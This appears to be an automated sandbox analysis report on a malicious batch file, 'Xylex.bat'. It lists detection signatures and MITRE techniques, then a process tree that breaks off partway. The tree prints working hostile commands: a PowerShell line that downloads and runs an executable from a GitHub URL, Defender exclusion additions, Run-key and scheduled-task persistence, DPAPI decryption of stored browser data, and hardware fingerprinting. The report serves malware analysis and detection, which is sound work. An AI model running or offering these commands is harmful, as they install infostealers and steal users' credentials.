bd8a66310436b855871114e5b70f7936e51a0afd2d8d5ab77a1a9ded69dc9c9f

Analysis

max time kernel
121s
max time network
142s
platform
windows11-21h2_x64
resource
win11-20240426-en
resource tags

arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system
submitted
03/06/2024, 04:13

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Executor/Xylex.bat
Size

255B
MD5

aa385e3b4104f4529680f554cdc39b40
SHA1

00ab4c02495c60b0fce2ec3e6967b864e1156cae
SHA256

e0cf8ed28a7efbcb910b6e7d78641179e39a81fae787308eb6112745e59f1076
SHA512

ad06ece28950fa050775f899d0574c44ccf86912f465bd5e7c041b972173ef16a34a6857be8dfb1bd13163099d710b9fcf3c09a110f406e3a8608e71df16c66e

Score

10^/10

execution persistence spyware stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe

Signatures

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	2628	powershell.exe
3	2628	powershell.exe
5	3232	curl.exe
13	4708	curl.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2196	powershell.exe
3736	powershell.exe
4248	powershell.exe
1360	powershell.exe
5108	powershell.exe

Executes dropped EXE 1 IoCs

pid	Process
396	xylex.exe

Loads dropped DLL 1 IoCs

pid	Process
396	xylex.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Local\\Temp\\OyLwFgcPpobCkad.ps1\""	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3938118698-2964058152-2337880935-1000\Software\Microsoft\Windows\CurrentVersion\Run\Steam = "C:\\Users\\Admin\\AppData\\Local\\Temp\\Executor\\xylex.exe"	reg.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
4	api.ipify.org

An obfuscated cmd.exe command-line is typically used to evade detection. 2 IoCs

pid	Process
2572	cmd.exe
2984	cmd.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
3760	schtasks.exe

Detects videocard installed 1 TTPs 12 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
1696	WMIC.exe
1916	WMIC.exe
4720	WMIC.exe
1000	WMIC.exe
4692	WMIC.exe
1028	WMIC.exe
1960	WMIC.exe
4652	WMIC.exe
2980	WMIC.exe
2416	WMIC.exe
2640	WMIC.exe
428	WMIC.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
2932	tasklist.exe
4784	tasklist.exe

Modifies registry key 1 TTPs 2 IoCs

Modify Registry

T1112

pid	Process
2948	reg.exe
2880	reg.exe

Suspicious behavior: EnumeratesProcesses 43 IoCs

pid	Process
2628	powershell.exe
2628	powershell.exe
1360	powershell.exe
1360	powershell.exe
4108	powershell.exe
4108	powershell.exe
2372	powershell.exe
2372	powershell.exe
2196	powershell.exe
2196	powershell.exe
3736	powershell.exe
3736	powershell.exe
4868	powershell.exe
4868	powershell.exe
4248	powershell.exe
4248	powershell.exe
4788	powershell.exe
4788	powershell.exe
3776	powershell.exe
3776	powershell.exe
3460	powershell.exe
3460	powershell.exe
5108	powershell.exe
5108	powershell.exe
2080	powershell.exe
2080	powershell.exe
3692	powershell.exe
3692	powershell.exe
396	xylex.exe
396	xylex.exe
4592	powershell.exe
4592	powershell.exe
396	xylex.exe
320	powershell.exe
320	powershell.exe
2352	powershell.exe
2352	powershell.exe
2480	powershell.exe
2480	powershell.exe
376	powershell.exe
376	powershell.exe
4064	powershell.exe
4064	powershell.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	1360	powershell.exe
Token: SeDebugPrivilege	2932	tasklist.exe
Token: SeDebugPrivilege	4108	powershell.exe
Token: SeDebugPrivilege	4784	tasklist.exe
Token: SeDebugPrivilege	2372	powershell.exe
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe
Token: SeManageVolumePrivilege	4324	WMIC.exe
Token: 33	4324	WMIC.exe
Token: 34	4324	WMIC.exe
Token: 35	4324	WMIC.exe
Token: 36	4324	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4556	WMIC.exe
Token: SeSecurityPrivilege	4556	WMIC.exe
Token: SeTakeOwnershipPrivilege	4556	WMIC.exe
Token: SeLoadDriverPrivilege	4556	WMIC.exe
Token: SeSystemProfilePrivilege	4556	WMIC.exe
Token: SeSystemtimePrivilege	4556	WMIC.exe
Token: SeProfSingleProcessPrivilege	4556	WMIC.exe
Token: SeIncBasePriorityPrivilege	4556	WMIC.exe
Token: SeCreatePagefilePrivilege	4556	WMIC.exe
Token: SeBackupPrivilege	4556	WMIC.exe
Token: SeRestorePrivilege	4556	WMIC.exe
Token: SeShutdownPrivilege	4556	WMIC.exe
Token: SeDebugPrivilege	4556	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4556	WMIC.exe
Token: SeRemoteShutdownPrivilege	4556	WMIC.exe
Token: SeUndockPrivilege	4556	WMIC.exe
Token: SeManageVolumePrivilege	4556	WMIC.exe
Token: 33	4556	WMIC.exe
Token: 34	4556	WMIC.exe
Token: 35	4556	WMIC.exe
Token: 36	4556	WMIC.exe
Token: SeIncreaseQuotaPrivilege	4324	WMIC.exe
Token: SeSecurityPrivilege	4324	WMIC.exe
Token: SeTakeOwnershipPrivilege	4324	WMIC.exe
Token: SeLoadDriverPrivilege	4324	WMIC.exe
Token: SeSystemProfilePrivilege	4324	WMIC.exe
Token: SeSystemtimePrivilege	4324	WMIC.exe
Token: SeProfSingleProcessPrivilege	4324	WMIC.exe
Token: SeIncBasePriorityPrivilege	4324	WMIC.exe
Token: SeCreatePagefilePrivilege	4324	WMIC.exe
Token: SeBackupPrivilege	4324	WMIC.exe
Token: SeRestorePrivilege	4324	WMIC.exe
Token: SeShutdownPrivilege	4324	WMIC.exe
Token: SeDebugPrivilege	4324	WMIC.exe
Token: SeSystemEnvironmentPrivilege	4324	WMIC.exe
Token: SeRemoteShutdownPrivilege	4324	WMIC.exe
Token: SeUndockPrivilege	4324	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2480 wrote to memory of 2628	2480	cmd.exe	77
PID 2480 wrote to memory of 2628	2480	cmd.exe	77
PID 2628 wrote to memory of 396	2628	powershell.exe	78
PID 2628 wrote to memory of 396	2628	powershell.exe	78
PID 396 wrote to memory of 1168	396	xylex.exe	82
PID 396 wrote to memory of 1168	396	xylex.exe	82
PID 1168 wrote to memory of 484	1168	cmd.exe	83
PID 1168 wrote to memory of 484	1168	cmd.exe	83
PID 1168 wrote to memory of 1360	1168	cmd.exe	84
PID 1168 wrote to memory of 1360	1168	cmd.exe	84
PID 1360 wrote to memory of 1184	1360	powershell.exe	85
PID 1360 wrote to memory of 1184	1360	powershell.exe	85
PID 1184 wrote to memory of 1960	1184	csc.exe	86
PID 1184 wrote to memory of 1960	1184	csc.exe	86
PID 396 wrote to memory of 5004	396	xylex.exe	87
PID 396 wrote to memory of 5004	396	xylex.exe	87
PID 5004 wrote to memory of 3232	5004	cmd.exe	144
PID 5004 wrote to memory of 3232	5004	cmd.exe	144
PID 396 wrote to memory of 1116	396	xylex.exe	89
PID 396 wrote to memory of 1116	396	xylex.exe	89
PID 1116 wrote to memory of 2932	1116	cmd.exe	133
PID 1116 wrote to memory of 2932	1116	cmd.exe	133
PID 396 wrote to memory of 320	396	xylex.exe	92
PID 396 wrote to memory of 320	396	xylex.exe	92
PID 396 wrote to memory of 2572	396	xylex.exe	93
PID 396 wrote to memory of 2572	396	xylex.exe	93
PID 320 wrote to memory of 4784	320	cmd.exe	94
PID 320 wrote to memory of 4784	320	cmd.exe	94
PID 2572 wrote to memory of 4108	2572	cmd.exe	142
PID 2572 wrote to memory of 4108	2572	cmd.exe	142
PID 396 wrote to memory of 2984	396	xylex.exe	96
PID 396 wrote to memory of 2984	396	xylex.exe	96
PID 2984 wrote to memory of 2372	2984	cmd.exe	97
PID 2984 wrote to memory of 2372	2984	cmd.exe	97
PID 396 wrote to memory of 2936	396	xylex.exe	98
PID 396 wrote to memory of 2936	396	xylex.exe	98
PID 396 wrote to memory of 1380	396	xylex.exe	99
PID 396 wrote to memory of 1380	396	xylex.exe	99
PID 396 wrote to memory of 1900	396	xylex.exe	100
PID 396 wrote to memory of 1900	396	xylex.exe	100
PID 2936 wrote to memory of 4324	2936	cmd.exe	101
PID 2936 wrote to memory of 4324	2936	cmd.exe	101
PID 396 wrote to memory of 452	396	xylex.exe	102
PID 396 wrote to memory of 452	396	xylex.exe	102
PID 1380 wrote to memory of 428	1380	cmd.exe	148
PID 1380 wrote to memory of 428	1380	cmd.exe	148
PID 396 wrote to memory of 4388	396	xylex.exe	104
PID 396 wrote to memory of 4388	396	xylex.exe	104
PID 1900 wrote to memory of 3760	1900	cmd.exe	105
PID 1900 wrote to memory of 3760	1900	cmd.exe	105
PID 452 wrote to memory of 2196	452	cmd.exe	106
PID 452 wrote to memory of 2196	452	cmd.exe	106
PID 4388 wrote to memory of 4556	4388	cmd.exe	107
PID 4388 wrote to memory of 4556	4388	cmd.exe	107
PID 396 wrote to memory of 5060	396	xylex.exe	108
PID 396 wrote to memory of 5060	396	xylex.exe	108
PID 5060 wrote to memory of 2484	5060	cmd.exe	109
PID 5060 wrote to memory of 2484	5060	cmd.exe	109
PID 396 wrote to memory of 4344	396	xylex.exe	110
PID 396 wrote to memory of 4344	396	xylex.exe	110
PID 396 wrote to memory of 1716	396	xylex.exe	111
PID 396 wrote to memory of 1716	396	xylex.exe	111
PID 4344 wrote to memory of 2492	4344	cmd.exe	112
PID 4344 wrote to memory of 2492	4344	cmd.exe	112

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Executor\Xylex.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2480
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell $down=New-Object System.Net.WebClient;$url='https://github.com/xylexV5/xylexz/releases/download/vypix/xylex.exe';$file='xylex.exe'; $down.DownloadFile($url,$file);$exec=New-Object -com shell.application;$exec.shellexecute($file);exit
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2628
- - C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe
    "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of WriteProcessMemory
    PID:396
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "type .\temp.ps1 | powershell.exe -noprofile -"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1168
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" type .\temp.ps1 "
        5⤵
        
        PID:484
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -noprofile -
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1360
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\1lbjxtdh\1lbjxtdh.cmdline"
        6⤵
        Suspicious use of WriteProcessMemory
        
        PID:1184
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6D9E.tmp" "c:\Users\Admin\AppData\Local\Temp\1lbjxtdh\CSC7912D2EB102E469BAB2DA46F11C232B8.TMP"
        7⤵
        
        PID:1960
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5004
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        Blocklisted process makes network request
        
        PID:3232
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1116
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:2932
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "tasklist"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:320
    - - C:\Windows\system32\tasklist.exe
        
        tasklist
        5⤵
        Enumerates processes with tasklist
        Suspicious use of AdjustPrivilegeToken
        
        PID:4784
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      Suspicious use of WriteProcessMemory
      PID:2572
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,239,201,125,189,85,50,4,60,86,187,43,137,41,48,196,233,213,129,190,11,15,149,32,64,239,3,143,191,59,101,111,20,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,246,135,251,0,181,183,233,186,114,15,245,188,208,245,31,150,9,200,137,27,9,44,246,144,174,248,175,185,252,40,48,213,48,0,0,0,236,53,216,175,7,179,81,168,213,78,218,191,50,236,204,3,79,205,25,29,20,21,118,162,19,255,75,116,186,60,19,24,12,29,72,121,224,200,28,184,3,195,243,72,223,119,33,196,64,0,0,0,253,80,200,208,20,202,93,188,38,34,78,69,205,85,213,2,96,16,4,77,242,30,93,195,25,218,103,153,123,80,11,122,104,181,58,74,206,183,127,13,129,250,64,230,58,127,189,83,243,131,247,91,172,24,239,115,71,16,186,85,38,25,239,134), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')"
      4⤵
      An obfuscated cmd.exe command-line is typically used to evade detection.
      Suspicious use of WriteProcessMemory
      PID:2984
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,204,147,102,183,124,99,53,79,167,54,86,58,241,194,103,187,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,64,71,148,20,56,45,62,124,213,252,32,214,91,152,25,96,161,38,54,100,221,34,34,64,80,213,100,42,63,170,132,90,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,232,221,23,18,160,226,22,152,228,243,194,190,221,56,200,24,104,100,48,146,36,36,248,213,15,145,128,202,194,178,60,110,48,0,0,0,21,151,46,188,247,62,218,248,248,76,77,167,103,205,215,78,200,127,228,5,114,231,15,170,166,152,172,121,109,64,173,73,122,176,112,236,136,94,118,5,136,254,112,46,5,221,11,191,64,0,0,0,55,180,127,118,64,244,99,236,146,115,4,200,209,110,24,141,239,130,207,224,69,68,52,198,114,116,25,174,214,122,204,234,229,27,215,233,195,201,61,105,107,153,131,253,250,154,23,145,203,204,133,47,242,121,107,222,77,240,182,223,71,140,69,32), $null, 'CurrentUser')
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2372
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2936
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic diskdrive get serialnumber
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4324
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1380
    - - C:\Windows\system32\reg.exe
        
        reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
        5⤵
        
        PID:428
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1900
    - - C:\Windows\system32\schtasks.exe
        
        schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
        5⤵
        Creates scheduled task(s)
        
        PID:3760
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:452
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        
        PID:2196
      - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jrtvppjd\jrtvppjd.cmdline"
        6⤵
        
        PID:380
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES74D2.tmp" "c:\Users\Admin\AppData\Local\Temp\jrtvppjd\CSC9833EEABE32E432F97135D1DABD333AC.TMP"
        7⤵
        
        PID:4920
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4388
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4556
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
      4⤵
      Suspicious use of WriteProcessMemory
      PID:5060
    - - C:\Windows\system32\cscript.exe
        
        cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
        5⤵
        
        PID:2484
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
        6⤵
        
        PID:5116
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:3736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
        7⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        
        PID:4248
        
        C:\Windows\system32\reg.exe
        
        reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\Executor\xylex.exe" /f
        7⤵
        Adds Run key to start application
        Modifies registry key
        
        PID:2948
        
        C:\Windows\system32\reg.exe
        
        reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
        7⤵
        Modifies registry key
        
        PID:2880
        
        C:\Windows\system32\curl.exe
        
        curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
        7⤵
        
        PID:3304
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:4344
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic baseboard get serialnumber
        5⤵
        
        PID:2492
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:1716
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:3424
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4880
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
      4⤵
      PID:2480
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_computersystemproduct get uuid
        5⤵
        
        PID:2136
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:4444
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1696
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:2772
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
        5⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:4868
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
      4⤵
      PID:2972
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic PATH Win32_VideoController GET Description,PNPDeviceID
        5⤵
        
        PID:3120
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
      4⤵
      PID:484
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic memorychip get serialnumber
        5⤵
        
        PID:3488
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
      4⤵
      PID:772
    - - C:\Windows\system32\curl.exe
        
        curl http://api.ipify.org/ --ssl-no-revoke
        5⤵
        
        PID:1804
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
      4⤵
      PID:2932
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        5⤵
        
        PID:4440
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
      4⤵
      PID:3956
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic cpu get processorid
        5⤵
        
        PID:4904
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
      4⤵
      PID:5032
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic bios get smbiosbiosversion
        5⤵
        
        PID:3108
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
      4⤵
      PID:4108
    - - C:\Windows\system32\getmac.exe
        
        getmac /NH
        5⤵
        
        PID:3500
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
      4⤵
      PID:3232
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic MemoryChip get /format:list
        5⤵
        
        PID:4320
    - - C:\Windows\system32\find.exe
        
        find /i "Speed"
        5⤵
        
        PID:4012
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
      4⤵
      PID:428
    - - C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        5⤵
        Detects videocard installed
        
        PID:1916
  - - C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
      4⤵
      PID:3552
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
